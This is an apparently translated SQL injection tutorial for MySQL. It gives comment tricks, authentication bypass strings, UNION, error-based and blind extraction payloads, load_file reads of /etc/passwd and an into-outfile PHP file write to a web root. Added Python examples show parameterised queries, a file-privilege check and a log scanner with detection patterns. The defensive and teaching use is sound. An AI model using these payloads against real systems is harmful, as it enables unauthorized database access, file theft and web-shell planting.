Basic knowledge of SQL injection
What is SQL injection?
SQL injection is an attack in which an attacker places SQL syntax into the input fields of a web form or into the query string of a page request, tricking the server into executing SQL it never intended to run. In some forms, the content entered by the user is used directly to build (or influence) a dynamic SQL statement, or is passed as an input parameter to a stored procedure. Such forms are particularly vulnerable to SQL injection.
MySQL comments
#
-- [space] or --+
/* ... */
Note that when these comment sequences are sent in a URL they may all need to be URL-encoded.
MySQL authentication bypass
;%00
' or 1=1 #
'/*!or*/1=1 --+
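The bypass above only works when the application splices the submitted value into the statement text. The following Python example is added here and is not part of the original article: it puts a vulnerable login check next to a parameterised one and runs the page's own payload through both. It uses the standard-library sqlite3 module as an offline stand-in for MySQL, so the page's # comment marker, which SQLite does not recognise, is written as "-- " (which both databases accept); the users table, its single row and the function names are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the MySQL users table on this page."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, "
        "username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('zhangsan', 's3cret')"
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """The anti-pattern: user input is pasted into the statement text, so a
    quote or comment marker inside the input becomes SQL syntax."""
    sql = (
        "SELECT id FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """The fix: placeholders keep the input as data. The driver sends the
    value separately, so it can never change the statement structure."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


# The page's bypass (' or 1=1 #) with the comment marker spelled "-- ",
# because SQLite, unlike MySQL, does not treat # as a comment.
BYPASS = "' or 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print("valid credentials, vulnerable:", vulnerable_login(db, "zhangsan", "s3cret"))
    print("bypass payload, vulnerable:   ", vulnerable_login(db, BYPASS, "anything"))
    print("bypass payload, parameterised:", safe_login(db, BYPASS, "anything"))
```

With a MySQL driver such as mysql-connector or PyMySQL the placeholder is written %s instead of ?, but the principle is identical: the statement text is fixed before any user value is bound to it.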
MySQL + operator
In MySQL, + can be used to join values inside a condition, for example:
select * from users where username='zhangsan' and "ab"="a"+"b";
Common MySQL functions
MySQL built-in functions are used throughout SQL injection. They fall into two groups: information functions, which return information about the MySQL server and its databases, and ordinary functions, which perform some operation.
Common information functions include:
database(): returns the name of the currently selected database.
version(): returns the database version; equivalent to @@version.
user(): returns the current user; equivalent to current_user. For example:
select user();       # root@localhost
select current_user; # root@localhost
@@datadir: returns the storage location of the database files.
select @@datadir; # D:\xampp\mysql\data\
Common ordinary functions include:
load_file(): reads a file from the server's filesystem and returns its contents.
select * from users union select 1,load_file('/etc/passwd'),3;
select * from users union select 1,load_file(0x2F6574632F706173737764),3; # hexadecimal notation avoids the need for single quotes
into outfile: writes a file; it only works if the database account has permission to write files.
select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';
select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';
concat(): returns the string formed by concatenating its arguments; if any argument is NULL, the result is NULL. Usage:
select concat(username,password) from users;
concat_ws(): like concat(), but the first argument is the separator and the remaining arguments are the fields to join.
select concat_ws(',',username,password) from users;
group_concat(): merges the values of multiple rows into a single result. Usage:
select group_concat(username) from users; # returns every username in the users table as one record
substring(), substr(): extract part of a string. Usage: substr(str,pos,length)
Note that pos starts at 1.
select substr((select database()),1,1);
ascii(): returns the ASCII value of a character.
select ascii('a'); # 97
length(): returns the length of a string. For example:
select length("123456"); # returns 6
if(exp1,exp2,exp3): if exp1 evaluates to true, returns exp2; otherwise returns exp3. For example:
select 1,2,if(1=1,3,-1); # 1,2,3
select 1,2,if(1=2,3,-1); # 1,2,-1
The functions above are the ones most commonly used in SQL injection work; a few others are used less often.
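Whether load_file() and into outfile can reach the filesystem at all depends on two server-side settings: the FILE privilege of the database account, and the secure_file_priv system variable (NULL disables server-side file reads and writes entirely, an empty value allows any path the mysqld process can access, and a directory restricts file access to that directory). The following Python check is an added example, not from the original article: it classifies the exposure from the output of SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS FOR CURRENT_USER(). The grant strings and variable values it runs against here are constructed, and the function names are the example's own.

```python
import re

# Matches one row of SHOW GRANTS output, e.g.
#   GRANT SELECT, FILE ON *.* TO 'app'@'%'
GRANT_RX = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\b", re.I
)


def has_file_privilege(grants):
    """True if any grant row confers FILE. FILE is a global privilege, so it
    can only come from a grant whose scope is *.* (named directly or via ALL)."""
    for line in grants:
        m = GRANT_RX.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False


def assess_file_exposure(secure_file_priv, grants):
    """Classify what load_file() / INTO OUTFILE could reach for this account.

    secure_file_priv: the Value column of SHOW VARIABLES LIKE 'secure_file_priv'
        (None or the string 'NULL' when file access is disabled).
    grants: the rows returned by SHOW GRANTS FOR CURRENT_USER().
    Returns (level, reason), level being "none", "restricted" or "unrestricted".
    """
    if not has_file_privilege(grants):
        return "none", "account lacks the FILE privilege"
    if secure_file_priv is None or str(secure_file_priv).strip().upper() == "NULL":
        return "none", "secure_file_priv is NULL: server-side file reads and writes are disabled"
    if str(secure_file_priv).strip() == "":
        return ("unrestricted",
                "FILE privilege with empty secure_file_priv: any path the mysqld process can access")
    return "restricted", "file access limited to " + str(secure_file_priv).strip()


# Constructed sample output of the two SHOW statements, for illustration only.
SAMPLE_VARIABLE = ""
SAMPLE_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'app'@'%'"]

if __name__ == "__main__":
    print(assess_file_exposure(SAMPLE_VARIABLE, SAMPLE_GRANTS))
```

An application account should normally produce the "none" result: grant it only the table-level privileges it needs, and keep secure_file_priv pointing at a dedicated directory or set to NULL, so that an injection in the application cannot turn into file reads or web shell writes.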
now(): returns the current system time.
hex(): returns the hexadecimal representation of a string.
unhex(): the inverse of hex(); decodes a hexadecimal string.
@@basedir: returns the MySQL installation directory.
@@version_compile_os: returns the operating system MySQL was compiled for.
MySQL database metadata
MySQL contains a database named information_schema. It is an information database that stores information about all the other databases kept by the MySQL server, such as database names, tables, table column names and access permissions. The commonly used tables in information_schema are:
schemata: stores information about every database in MySQL. Its contents match the output of show databases.
tables: stores information about the tables in each database, describing in detail a table's schema, type and storage engine. The output of show tables from security comes from this table.
columns: describes in detail all the columns of a table and the information about each column. The output of show columns from users comes from this table.
The following shows how these three tables are used to obtain database information:
select database(); # query the selected database
select schema_name from information_schema.schemata limit; # query the databases
select table_name from information_schema.tables where table_schema=database() limit; # query the tables
select column_name from information_schema.columns where table_name='users' limit; # query the columns
SQL injection types
SQL injection can be roughly divided into conventional SQL injection and blind SQL injection. Blind injection can in turn be divided into time-based blind injection and content-based (boolean) blind injection.
There are many explanations of blind SQL injection on the Internet, so it is not covered at length here; the idea is easiest to describe with concrete examples.
In time-based blind injection the commonly used functions are if() and sleep(). The basic SQL looks like this:
select * from users where id=1 and if(length(user())=14,sleep(3),1);
select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);
Wide-byte injection
For details, refer to the separate article on wide-byte injection. Wide-byte injection is generally caused by a mismatch between the web page encoding and the database encoding; in wide-byte injection, %d5 or %df is used to bypass the escaping.
Summary of common MySQL statements
Regular injection
1' order by num # determine the number of columns
1' union select 1,2,3 # determine the number of columns
-1' union select 1,2,3 # determine which columns are displayed on the page
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata # list all databases in MySQL
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="dbname" # "dbname" can also be written as database() or as hex(dbname)
-1' union select 1,2,column_name from information_schema.columns where table_name="table_name" limit #
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name" limit # "table_name" can also be written as hex(table_name)
-1' union select 1,2,3 and '1'='1 # used when the comment marker cannot be used
Double-query (error-based) injection
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a; # this statement is commonly used in blind SQL injection to obtain database information
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a; # obtain the names of the database tables
The form used in an injection is:
1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b) --+
This technique obtains the required information from the error message MySQL returns when it executes the statement. A later article will analyze this method in detail.
Boolean blind injection
1' and ascii(substr((select database()),1,1))>99
1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90
Boolean blind injection infers information from the page content that corresponds to the SQL statement evaluating to true or false.
Time-based blind injection
1' AND if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) --+
1' AND if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+
The two statements above are equivalent. Time-based blind injection differs from conventional SQL injection: it generally uses the if() and sleep() functions, and then judges from how long the page takes to respond whether sleep() was executed. Whether or not sleep() executed is what reveals the required information.
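The payloads listed in the regular, double-query, boolean blind and time-based blind sections above share a small set of tokens: comment markers, union select, information_schema, sleep(), floor(rand()), load_file()/into outfile, and the %df/%d5 prefix of wide-byte injection. The following Python script is an added example, not part of the original article: it takes a few constructed Apache-style access log lines, URL-decodes the query string of each request and reports which of those signatures appear. The rule names, the analyze_query and scan_log functions and the log lines are all the example's own. Decoding has to happen before matching, because the markers arrive as %23 and --+ rather than # and "-- "; the wide-byte rule is the one exception, since it must see the raw percent-encoding. A match is a lead for review, not proof of an attack.

```python
import re
from urllib.parse import unquote_plus

# Rules matched against the URL-decoded query string.
DECODED_RULES = [
    ("comment",            re.compile(r"#|--(?:\s|$)|/\*", re.I)),
    ("tautology",          re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("union_select",       re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("time_based",         re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error_based",        re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("file_io",            re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)),
]
# Rules matched against the raw (still percent-encoded) query string: the
# wide-byte prefix is only visible before decoding.
RAW_RULES = [
    ("wide_byte", re.compile(r"%d[5f](?:%27|')", re.I)),
]


def analyze_query(raw_query):
    """Return the sorted list of rule names that fire for one query string."""
    decoded = unquote_plus(raw_query)   # %27 -> ', %23 -> #, + -> space
    found = {name for name, rx in DECODED_RULES if rx.search(decoded)}
    found |= {name for name, rx in RAW_RULES if rx.search(raw_query)}
    return sorted(found)


# Extracts the request target from a combined-format access log line.
REQUEST_RX = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_log(lines):
    """Return (request target, findings) for every line whose query string
    triggers at least one rule. Requests without a query string are skipped."""
    hits = []
    for line in lines:
        m = REQUEST_RX.search(line)
        if not m:
            continue
        target = m.group("target")
        query = target.partition("?")[2]
        if not query:
            continue
        findings = analyze_query(query)
        if findings:
            hits.append((target, findings))
    return hits


# Constructed sample log lines (the /Less-1/ path and client address are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,2,'
    'group_concat(schema_name)%20from%20information_schema.schemata%23 HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/?id=1%27%20and%20if(length(user())=14,'
    'sleep(3),1)--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-1/?id=1%df%27%20or%201=1%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(findings, target)
```

Signature rules like these are cheap to run over existing logs, but they only see GET parameters; POST bodies and the responses' timing (the tell-tale of sleep()) need the application log or a proxy in front of it.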
Summary
The above is the basic knowledge needed for SQL injection. The next article will explain SQL injection in detail through examples. Today's article covers only the basics; if you are interested in SQL injection, please stay tuned to Help House.